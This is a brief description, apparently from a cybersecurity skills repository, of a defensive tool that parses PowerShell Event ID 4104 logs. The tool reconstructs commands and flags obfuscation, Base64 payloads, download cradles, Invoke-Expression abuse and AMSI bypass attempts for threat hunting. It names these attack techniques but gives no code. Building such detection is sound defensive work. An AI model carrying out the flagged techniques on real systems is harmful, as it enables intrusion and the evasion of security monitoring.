analyzing-powershell-script-block-logging
mukul975/Anthropic-Cybersecurity-Skills
Parses Event ID 4104 script block logs from PowerShell Operational EVTX files to reconstruct multi-block commands, score risks, and flag obfuscation, Base64 payloads, download cradles, Invoke-Expression abuse, and AMSI bypass attempts for SOC hunting and detection tuning.
